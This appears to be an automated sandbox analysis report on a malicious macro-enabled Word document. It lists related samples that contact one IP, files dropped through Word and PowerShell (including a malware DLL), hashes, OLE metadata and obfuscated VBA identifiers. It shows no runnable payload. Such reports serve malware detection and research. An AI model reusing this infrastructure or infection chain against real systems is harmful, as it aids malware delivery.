                                          List 2020_12_21 OZV3903.docGet hashmaliciousBrowse
                                          • 184.66.18.83
                                          MF11374 2020.docGet hashmaliciousBrowse
                                          • 184.66.18.83
                                          SecuriteInfo.com.W97M.DownLoader.5028.13042.docGet hashmaliciousBrowse
                                          • 184.66.18.83
                                          INFO-22.docGet hashmaliciousBrowse
                                          • 184.66.18.83
                                          Documento_9276701.docGet hashmaliciousBrowse
                                          • 184.66.18.83
                                          Dati_2112_122020.docGet hashmaliciousBrowse
                                          • 184.66.18.83
                                          Informacion 122020 N-98239.docGet hashmaliciousBrowse
                                          • 184.66.18.83
                                          as233456.docGet hashmaliciousBrowse
                                          • 184.66.18.83
                                          Y0124.docGet hashmaliciousBrowse
                                          • 184.66.18.83
                                          Archivo-2020-98864.docGet hashmaliciousBrowse
                                          • 184.66.18.83
                                          file.docGet hashmaliciousBrowse
                                          • 184.66.18.83
                                          Inf_CHB9147.docGet hashmaliciousBrowse
                                          • 184.66.18.83
                                          59154-2212-122020.docGet hashmaliciousBrowse
                                          • 184.66.18.83
                                          14 2212 2020 062_546248.docGet hashmaliciousBrowse
                                          • 184.66.18.83
                                          INFO.docGet hashmaliciousBrowse
                                          • 184.66.18.83

                                          JA3 Fingerprints

                                          No context

                                          Dropped Files

                                          No context

                                          Created / dropped Files

                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{4538A4CD-211A-44E2-8D58-9E77A8685DB1}.tmp
                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):1536
                                          Entropy (8bit):1.3586208805849453
                                          Encrypted:false
                                          SSDEEP:3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlbW:IiiiiiiiiifdLloZQc8++lsJe1Mz1
                                          MD5:415FA7477DD74C9EBE83E5D6CCEB3772
                                          SHA1:25DCB4950FA783B96135CD7DD9B4767650823CD5
                                          SHA-256:7BD09F56EE1526ABAD7B45333FF8E2AEE05C5AD4CD5767A4A3E04459C120362C
                                          SHA-512:406E8A8A3D1CFE36041544BBA15769A5DAF7F4F7720AE7BE2672703CC2F679127E34642DBE814918C83D96EE25540E1CD37EEAFA0E9A8B29D998FA3D85BEB666
                                          Malicious:false
                                          Preview: ..(...(...(...(...(...(...(...(...(...(...(...A.l.b.u.s...A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................."...&...*.......:...>...............................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{B4F87BA3-97C0-4A14-814E-1968BCE52029}.tmp
                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):1024
                                          Entropy (8bit):0.05390218305374581
                                          Encrypted:false
                                          SSDEEP:3:ol3lYdn:4Wn
                                          MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                          SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                          SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                          SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                          Malicious:false
                                          Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd
                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):162688
                                          Entropy (8bit):4.254347959432493
                                          Encrypted:false
                                          SSDEEP:1536:C6iL3FNSc8SetKB96vQVCBumVMOej6mXmYarrJQcd1FaLcm48s:CjJNSc83tKBAvQVCgOtmXmLpLm4l
                                          MD5:3D7220D81CAAB25C480E3FA0D671FF85
                                          SHA1:871F5E801F756C8D843BA3127C3E068786BFA796
                                          SHA-256:F559D79058031A577A8C9E6F46A2959332CAE13AD81B04ADADA3A2D436FEEAE1
                                          SHA-512:048C7E42A0A04C343981FD52BA7E6DEB86702AF418688E8C1742EBDE2B93EDDD30A763A68FCCD3C56F885E5BBDA6D46B9253DD00C20511CB83640122A4D83466
                                          Malicious:false
                                          Preview: MSFT................Q................................#......$....... ...................d.......,...........X....... ...........L...........x.......@...........l.......4...........`.......(...........T...................H...........t.......<...........h.......0...........\.......$...........P...........|.......D...........p.......8...........d.......,...........X....... ...........L...........x.......@........ ..l ... ..4!...!...!..`"..."..(#...#...#..T$...$...%...%...%..H&...&...'..t'...'..<(...(...)..h)...)..0*...*...*..\+...+..$,...,...,..P-...-......|.......D/.../...0..p0...0..81...1...2..d2...2..,3...3...3..X4...4.. 5...5...5..L6...6...7..x7...7..@8.......8..............................$................................................................................x..xG..............T........................................... ...........................................................&!..............................................................................................
                                          C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Informacion_4-09757.LNK
                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:14 2020, mtime=Wed Aug 26 14:08:14 2020, atime=Thu Jan 7 20:53:35 2021, length=206848, window=hide
                                          Category:dropped
                                          Size (bytes):2118
                                          Entropy (8bit):4.585436148417174
                                          Encrypted:false
                                          SSDEEP:24:813w/XTwz6Ikn7BUNe3e03BDv3qwdM7dD213w/XTwz6Ikn7BUNe3e03BDv3qwdMj:82/XT3IkdqCxIwQh22/XT3IkdqCxIwQ/
                                          MD5:A947F1D4309EB5BA75486764C6B2A32C
                                          SHA1:3F79C1CDEE10E9E73F00F031EBA22049B2D9DAC7
                                          SHA-256:30A466857DE5BF1E57E9704127AA3A0E4DEECB719F723004142EBC2049BF26B0
                                          SHA-512:15837EF98296FF4BC91DC56DB56342F8B3DA101B284C466BCBC47A70AD02F9E016C36A729C411A0B0934CA85CE7C9505DAAE03DC2031F24A6CEF74E275973611
                                          Malicious:false
                                          Preview: L..................F.... ........{.......{....O.?....(...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....x.2..(..'R.. .INFORM~1.DOC..\.......Q.y.Q.y*...8.....................I.n.f.o.r.m.a.c.i.o.n._.4.-.0.9.7.5.7...d.o.c.......................-...8...[............?J......C:\Users\..#...................\\899552\Users.user\Desktop\Informacion_4-09757.doc.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.I.n.f.o.r.m.a.c.i.o.n._.4.-.0.9.7.5.7...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......899552..........D_....3N.
                                          C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):95
                                          Entropy (8bit):4.596840382321402
                                          Encrypted:false
                                          SSDEEP:3:M13YMvRI1Q4FS0LDKXYMvRI1Q4FSmX13YMvRI1Q4FSv:MJRRwWXRRwRRx
                                          MD5:26DC406546A7A8CEB0E40BCFC4E6D5E5
                                          SHA1:F01C29F6B6646EBAC52A7BB7988786E8180342E9
                                          SHA-256:886577290588080692A02C8C80EE249A37A4CE6623D57E5F90F03C0EBB0D9280
                                          SHA-512:74FAC7DFDF170EC03F8AA68B9944B11483360B7A09AB1BCB572BDD6537B9FFAF584045E3CEC661D9327EF9DFD03A91BA5E17D06996A6671DF9C3A4EED8F92D25
                                          Malicious:false
                                          Preview: [doc]..Informacion_4-09757.LNK=0..Informacion_4-09757.LNK=0..[doc]..Informacion_4-09757.LNK=0..
                                          C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):162
                                          Entropy (8bit):2.431160061181642
                                          Encrypted:false
                                          SSDEEP:3:vrJlaCkWtVyzALORwObGUXKbylln:vdsCkWtJLObyvb+l
                                          MD5:6AF5EAEBE6C935D9A5422D99EEE6BEF0
                                          SHA1:6FE25A65D5CC0D4F989A1D79DF5CE1D225D790EC
                                          SHA-256:CE916A38A653231ED84153C323027AC4A0695E0A7FB7CC042385C96FA6CB4719
                                          SHA-512:B2F51A8375748037E709D75C038B48C69E0F02D2CF772FF355D7203EE885B5DB9D1E15DA2EDB1C1E2156A092F315EB9C069B654AF39B7F4ACD3EFEFF1F8CAEB0
                                          Malicious:false
                                          Preview: .user..................................................A.l.b.u.s.............p.........^...............^.............P.^..............^.....z.........^.....x...
                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\R35Y20JZF8WLXEKH5GYH.temp
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):8016
                                          Entropy (8bit):3.589458325568167
                                          Encrypted:false
                                          SSDEEP:96:chQCsMqZqvsqvJCwo+z8hQCsMqZqvsEHyqvJCworQzkKYyHtf8R8lUVUIu:cywo+z8yMHnorQzkyf8RsIu
                                          MD5:14F063813E16DD0C7C71732BA038FEB5
                                          SHA1:F616F18CFDEE9FE06DAC2F93D33CC73A50E79F62
                                          SHA-256:27B8A0FD2B4A50874EBCFA9D1F8B2DC9A66DDC450992E4D289CA9FDB1DB6A6DA
                                          SHA-512:A803F2ECB1ABC35929EC5530322E50272EDCD05996929185888DAC0D77DCB058A488527F30D00F6B68E44B275DD8CD26D5927BE8F476775266DE04ABA5B13863
                                          Malicious:false
                                          Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                          C:\Users\user\Bqpeen6\Bbs5w_e\Yvtlx6p4.dll
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                          Category:dropped
                                          Size (bytes):239104
                                          Entropy (8bit):7.444833448975582
                                          Encrypted:false
                                          SSDEEP:3072:KC1sUJsEIoJCTFM5/A8eWLdlU8thEnYsqibnjPw+a5DIYvK8UIDoQQh3:KC1NJMoJywAkdrHEn1qibjm5DIYSX
                                          MD5:0BCAFFBDA4138F2EE2786CFD098C1DA9
                                          SHA1:3D6E52F126809C05E69F1D543B7F8D53435A8E17
                                          SHA-256:5E9F4504B7E0938A2B2EB9A7F090BE9F4B1101AA3BE145A3B5895CB14BACD0EF
                                          SHA-512:92EA1A4CDDA5A58D275C1058467C5F2DC5147A2D321A41396C6598EAF3D9520AAB114C411CDA08A7D8F3DB90E36E9D3F10720541DDF7FAA7758B9C6073CD92C2
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                          • Antivirus: ReversingLabs, Detection: 90%
                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Y.LC.."..."...".......".....a."...#.d.".:4Y...".....%.".......".......".......".Rich..".........................PE..L....H._...........!.....J...X......uz.......`......................................................................p...I.......<......................................................................@............`..\............................text...wH.......J.................. ..`.rdata...G...`...H...N..............@..@.data....2..........................@....rsrc...............................@..@.reloc...#.......$..................@..B........................................................................................................................................................................................................................................................................................................................
                                          C:\Users\user\Desktop\~$formacion_4-09757.doc
                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):162
                                          Entropy (8bit):2.431160061181642
                                          Encrypted:false
                                          SSDEEP:3:vrJlaCkWtVyzALORwObGUXKbylln:vdsCkWtJLObyvb+l
                                          MD5:6AF5EAEBE6C935D9A5422D99EEE6BEF0
                                          SHA1:6FE25A65D5CC0D4F989A1D79DF5CE1D225D790EC
                                          SHA-256:CE916A38A653231ED84153C323027AC4A0695E0A7FB7CC042385C96FA6CB4719
                                          SHA-512:B2F51A8375748037E709D75C038B48C69E0F02D2CF772FF355D7203EE885B5DB9D1E15DA2EDB1C1E2156A092F315EB9C069B654AF39B7F4ACD3EFEFF1F8CAEB0
                                          Malicious:false
                                          Preview: .user..................................................A.l.b.u.s.............p.........^...............^.............P.^..............^.....z.........^.....x...

                                          Static File Info

                                          General

                                          File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Subject: withdrawal yellow Australia Credit Card Account Alabama connecting Jamaican Dollar Configuration Wooden Extension copy Marshall Islands ivory Rubber, Author: Rayan Perrin, Template: Normal.dotm, Last Saved By: Charlotte Moreau, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon Dec 21 16:46:00 2020, Last Saved Time/Date: Mon Dec 21 16:46:00 2020, Number of Pages: 1, Number of Words: 5823, Number of Characters: 33197, Security: 8
                                          Entropy (8bit):6.403754266735514
                                          TrID:
                                          • Microsoft Word document (32009/1) 54.23%
                                          • Microsoft Word document (old ver.) (19008/1) 32.20%
                                          • Generic OLE2 / Multistream Compound File (8008/1) 13.57%
                                          File name:Informacion_4-09757.doc
                                          File size:206848
                                          MD5:4adc5e8e53a40fd14ff90e99e94e39cb
                                          SHA1:406d00f10a2298acfe192fb85e870d5e5d094263
                                          SHA256:1c29c870c5c27cec2f22790ecc87e0c1c1ae59bd4e5c8204ec9182524d68d68f
                                          SHA512:4aadffe4eb5125bca42ff126ada8b88988a36a4017044130354bde74ca03db4d73154ae6b854244e3c23df0ffe57ad72cce9f25f4e26c5ef615be73ab802df1a
                                          SSDEEP:3072:fY9ufstRUUKSns8T00JSHUgteMJ8qMD7gZNBTPmWS93OO90u/i6j3d:fY9ufsfgIf0pL5hS93OO90u/i6j3d
                                          File Content Preview:........................>.......................8...........;...............5...6...7..........................................................................................................................................................................

                                          File Icon

                                          Icon Hash:e4eea2aaa4b4b4a4

                                          Static OLE Info

                                          General

                                          Document Type:OLE
                                          Number of OLE Files:1

                                          OLE File "Informacion_4-09757.doc"

                                          Indicators

                                          Has Summary Info:True
                                          Application Name:Microsoft Office Word
                                          Encrypted Document:False
                                          Contains Word Document Stream:True
                                          Contains Workbook/Book Stream:False
                                          Contains PowerPoint Document Stream:False
                                          Contains Visio Document Stream:False
                                          Contains ObjectPool Stream:
                                          Flash Objects Count:
                                          Contains VBA Macros:True

                                          Summary

                                          Code Page:1252
                                          Title:
                                          Subject:withdrawal yellow Australia Credit Card Account Alabama connecting Jamaican Dollar Configuration Wooden Extension copy Marshall Islands ivory Rubber
                                          Author:Rayan Perrin
                                          Keywords:
                                          Comments:
                                          Template:Normal.dotm
                                          Last Saved By:Charlotte Moreau
                                          Revion Number:1
                                          Total Edit Time:0
                                          Create Time:2020-12-21 16:46:00
                                          Last Saved Time:2020-12-21 16:46:00
                                          Number of Pages:1
                                          Number of Words:5823
                                          Number of Characters:33197
                                          Creating Application:Microsoft Office Word
                                          Security:8

                                          Document Summary

                                          Document Code Page:1252
                                          Number of Lines:276
                                          Number of Paragraphs:77
                                          Thumbnail Scaling Desired:False
                                          Company:
                                          Contains Dirty Links:False
                                          Shared Document:False
                                          Changed Hyperlinks:False
                                          Application Version:983040

                                          Streams with VBA

                                          VBA File Name: UserForm1, Stream Size: -1
                                          General
                                          Stream Path:Macros/UserForm1
                                          VBA File Name:UserForm1
                                          Stream Size:-1
                                          Data ASCII:
                                          Data Raw:

                                          VBA Code Keywords

                                          Keyword
                                          False
                                          VB_Exposed
                                          Attribute
                                          VB_Name
                                          VB_Creatable
                                          VB_PredeclaredId
                                          VB_GlobalNameSpace
                                          VB_Base
                                          VB_Customizable
                                          VB_TemplateDerived
                                          VBA Code
                                          VBA File Name: UserForm2, Stream Size: -1
                                          General
                                          Stream Path:Macros/UserForm2
                                          VBA File Name:UserForm2
                                          Stream Size:-1
                                          Data ASCII:
                                          Data Raw:

                                          VBA Code Keywords

                                          Keyword
                                          False
                                          VB_Exposed
                                          Attribute
                                          VB_Name
                                          VB_Creatable
                                          VB_PredeclaredId
                                          VB_GlobalNameSpace
                                          VB_Base
                                          VB_Customizable
                                          VB_TemplateDerived
                                          VBA Code
                                          VBA File Name: UserForm3, Stream Size: -1
                                          General
                                          Stream Path:Macros/UserForm3
                                          VBA File Name:UserForm3
                                          Stream Size:-1
                                          Data ASCII:
                                          Data Raw:

                                          VBA Code Keywords

                                          Keyword
                                          False
                                          VB_Exposed
                                          Attribute
                                          VB_Name
                                          VB_Creatable
                                          VB_PredeclaredId
                                          VB_Base
                                          VB_Customizable
                                          VB_TemplateDerived
                                          VB_GlobalNameSpace
                                          VBA Code
                                          VBA File Name: UserForm4, Stream Size: -1
                                          General
                                          Stream Path:Macros/UserForm4
                                          VBA File Name:UserForm4
                                          Stream Size:-1
                                          Data ASCII:
                                          Data Raw:

                                          VBA Code Keywords

                                          Keyword
                                          False
                                          VB_Exposed
                                          Attribute
                                          VB_Name
                                          VB_Creatable
                                          VB_Customizable
                                          VB_PredeclaredId
                                          VB_GlobalNameSpace
                                          VB_Base
                                          VB_TemplateDerived
                                          VBA Code
                                          VBA File Name: UserForm5, Stream Size: -1
                                          General
                                          Stream Path:Macros/UserForm5
                                          VBA File Name:UserForm5
                                          Stream Size:-1
                                          Data ASCII:
                                          Data Raw:

                                          VBA Code Keywords

                                          Keyword
                                          False
                                          VB_Exposed
                                          Attribute
                                          VB_Name
                                          VB_Creatable
                                          VB_PredeclaredId
                                          VB_GlobalNameSpace
                                          VB_Base
                                          VB_Customizable
                                          VB_TemplateDerived
                                          VBA Code
                                          VBA File Name: L6bihtdtnasc, Stream Size: 681
                                          General
                                          Stream Path:Macros/VBA/L6bihtdtnasc
                                          VBA File Name:L6bihtdtnasc
                                          Stream Size:681
                                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . # . . . w . . . . . . . . . . . S . . } . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                          Data Raw:01 16 01 00 00 f0 00 00 00 1c 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 23 02 00 00 77 02 00 00 00 00 00 00 01 00 00 00 53 8f ed 7d 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                          VBA Code Keywords

                                          Keyword
                                          Attribute
                                          VB_Name
                                          VBA Code
                                          VBA File Name: Qfepbztq9r8o1l76, Stream Size: 16867
                                          General
                                          Stream Path:Macros/VBA/Qfepbztq9r8o1l76
                                          VBA File Name:Qfepbztq9r8o1l76
                                          Stream Size:16867
                                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 0 . . . . . . . . . . S . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                          Data Raw:01 16 01 00 00 f0 00 00 00 8c 08 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 93 08 00 00 0f 30 00 00 00 00 00 00 01 00 00 00 53 8f f0 d9 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                          VBA Code Keywords

                                          Keyword
                                          xaeBOIr
                                          QokjF
                                          RmtjCU:
                                          ftFiaG
                                          VBA.Replace
                                          "hzJiH.sMeEIQHFY.gexKUGUI"
                                          OGQTPEH
                                          lvaOGgAa
                                          szYhABIf
                                          MacHEivy:
                                          "SIYsHYJ.szjuc.RoiPd"
                                          rHCZjEw:
                                          tbIDBxAIB:
                                          IdHEFHG
                                          BQvbJ
                                          UMafav
                                          Rwjxp:
                                          wMbuCy
                                          jvyTJ:
                                          "IqlrqA.vtwEIm.lETEIJA"
                                          pIPwEU
                                          "PJdCYHGDx.xMcac.TuKMx"
                                          pHvmE:
                                          rrzVQC
                                          DVIODFG
                                          CFoGN:
                                          "fJnkNjH.nGdvFGC.zkPVeOFC"
                                          Rwjxp
                                          qoqOYAnKJ
                                          XgcnJVEG
                                          Binary
                                          HGRHh
                                          "KlTTDXhW.iidsEDJqa.QyLHeCE"
                                          dkidmfe:
                                          "ihoEED.PDrskFBA.bJbNF"
                                          "TtYIGDY.tYlIB.IXupzJHD"
                                          Uzngzb:
                                          "PuasnADG.cAXTGAN.sUXKFmjG"
                                          "atyQEDH.RWyVArHAB.pVvDpHEuD"
                                          FfUdDPm
                                          qoqOYAnKJ:
                                          "cHBGAIHG.cFpJGIJl.vbUoN"
                                          ftFiaG:
                                          natkhGFQD
                                          RmtjCU
                                          uTaPAIGNH
                                          "DlzhGE.NKfSJqpcH.SjmcJJBJJ"
                                          "TemfXF.bfMha.jnRqFK"
                                          slPRBMFEB
                                          XytRGbWWR:
                                          "MyIuIGxxD.VpYVAPIw.iMbgAEuc"
                                          "wLTBZpoB.cMFiJ.phmHGHlJI"
                                          RlXsHI:
                                          mMDIBBGH
                                          FMrcDEFEQ
                                          psnrIHICY:
                                          XgcnJVEG:
                                          jTeLG:
                                          jLvyJe
                                          daVOIQkE
                                          yUhrXM
                                          kloRF
                                          "jyHqihfKA.HgOuAh.cuXjB"
                                          Resume
                                          oSyUH:
                                          tbIDBxAIB
                                          OdtXGe:
                                          bKRLCqR:
                                          aiqHJw
                                          "vQgTUNiC.nBxYKHe.euwNI"
                                          StHrFBBI
                                          yffJdpMFE
                                          ErRsBJD:
                                          nYVDF:
                                          "XxmzEU.DyPyOF.GnJMGdHHU"
                                          "jDyAHIGsG.AovRB.OpXLjg"
                                          "YYaOCJyF.hdZxD.qyepAED"
                                          uKlZBM:
                                          dOVxshsCI
                                          HGRHh:
                                          "FRqFHc.GehTAIFeH.hjCZI"
                                          Uzngzb
                                          uoFsgOnl:
                                          ChrW(wdKeyS)
                                          nYVDF
                                          "GBOjolD.psdHCIh.HuOuBFiwJ"
                                          aNLAA:
                                          FfUdDPm:
                                          TrEWGLLVF
                                          lBpiLIQXL
                                          "nSjSfx.APeET.VNDhZIFF"
                                          RGWBBRDVD
                                          aMkVd
                                          LeiBYFBA
                                          "noFGAFvHG.kPRnsl.iUayAGGJ"
                                          DhJcAB
                                          "xWUqJ.yvIzE.lOPJGBIID"
                                          QuDJB
                                          zwuglCFsC:
                                          "zZudKI.oKzyJHE.mICJqCLW"
                                          rrzVQC:
                                          MGNTHC
                                          "hbDlwlQJE.qsCgEh.gJUPEC"
                                          MJenEIFhH:
                                          shBWyQG
                                          VB_Name
                                          TrEWGLLVF:
                                          xLdgAFZA
                                          DobhmY:
                                          IYLpCJ:
                                          ErRsBJD
                                          RlXsHI
                                          "XLYdgIG.gQzexpZZ.RhwWu"
                                          SWDkIFtR
                                          kQkqMq
                                          "SiPdpA.jcGoGFZG.ZFwWf"
                                          jSyHcJYnj
                                          zbWDKmIB
                                          "GCWzCzxj.EBrCIIlA.lFKuCCPB"
                                          LPluFEHD
                                          DVIODFG:
                                          FMrcDEFEQ:
                                          NfmoCHe
                                          MJenEIFhH
                                          zwuglCFsC
                                          BcjsHnEg
                                          bqloIAW:
                                          "LVNMDIBAF.xsRQCZg.LUmCCICh"
                                          UYDdxBQA
                                          XDsudqEDb
                                          "DdVxFIBEH.DhxsFC.oiBeEZBI"
                                          wACNy
                                          "mUzmj.DGYhPmFUM.FjtHqCA"
                                          fgHICJHJ
                                          mQgRQJCTI
                                          LPluFEHD:
                                          "RatqHEg.BQzvFHj.DPRWAZfCV"
                                          IYLpCJ
                                          "IQTLdE.FEpPmy.IHdOCgSB"
                                          jCzixXAB
                                          fgHICJHJ:
                                          QuDJB:
                                          gsCwnX
                                          psnrIHICY
                                          hDtiCc
                                          "lVppvD.wgJNDzCy.gLKXd"
                                          "eRlbAHDf.VXIsV.yVVaFD"
                                          jvyTJ
                                          bqloIAW
                                          "gDQhOr.AdtYHAyCC.QdPVFH"
                                          IdHEFHG:
                                          "IhtjJG.WtfQBcbC.TNiPT"
                                          kSctB
                                          dkidmfe
                                          FOjwlJ
                                          NwkUz
                                          qarxACNqv
                                          daVOIQkE:
                                          "SlGmA.VBVZECsNI.vtRtHG"
                                          "kpKDCAObU.IvFrXHGJP.NZDXABTE"
                                          pHvmE
                                          xJNGw
                                          aNLAA
                                          tJBtVVy
                                          Function
                                          iAPcH
                                          DkKDCCGD
                                          uhOGZf
                                          WMQzHDM
                                          lICRFJ:
                                          rNlIgDGG:
                                          BQvbJ:
                                          kSctB:
                                          XDsudqEDb:
                                          rHCZjEw
                                          rNlIgDGG
                                          lICRFJ
                                          uKlZBM
                                          "fQjsm.gYjzDADu.uLEQDCB"
                                          "ZgugNT.fyNMD.sGSsb"
                                          rLjMqJC
                                          rPTbFNpIg
                                          "NwDyjJHj.sGvCc.zUWPZDN"
                                          CFoGN
                                          "FtLdBBFt.TgcFADq.QKdzF"
                                          String
                                          MacHEivy
                                          TAYfnygFI
                                          DhJcAB:
                                          yYtBFhh:
                                          mQgRQJCTI:
                                          oSyUH
                                          qarxACNqv:
                                          "Cyabs.OCfwHDf.gOFzDG"
                                          TVKeFhHT
                                          pRVuBH
                                          dHHCYIX
                                          OdtXGe
                                          rLjMqJC:
                                          hDtiCc:
                                          xJNGw:
                                          yYtBFhh
                                          "wWbKMTCsB.TfYnablxs.EKZtUghe"
                                          XytRGbWWR
                                          IyiwBHG
                                          HHrDJ
                                          jTeLG
                                          Error
                                          Enpewjzyrpx()
                                          Attribute
                                          "DhFqOHHFH.LWgNFDF.xxbwQDD"
                                          Close
                                          dSxaFFFR
                                          "ugVrJFm.YuthuIJ.ckCqK"
                                          uoFsgOnl
                                          "PuLhbH.VgtBGDc.mMkjrBBF"
                                          "bsYyG.zoiSBCHJ.dLLbHJeCm"
                                          IQtEqBGHB
                                          etMoIHJ
                                          DobhmY
                                          JXfJku
                                          "NrQDg.kdwxHDRVG.YuMDH"
                                          shBWyQG:
                                          xISbD
                                          "spaJuD.hyjRQhJ.zAAqzHBB"
                                          "WdQWH.qAFZlDnI.EPZlJJDnD"
                                          bKRLCqR
                                          VBA Code
                                          VBA File Name: R4bm01nsbtdt1, Stream Size: 1106
                                          General
                                          Stream Path:Macros/VBA/R4bm01nsbtdt1
                                          VBA File Name:R4bm01nsbtdt1
                                          Stream Size:1106
                                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . u . . . . . . . . . . . S . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
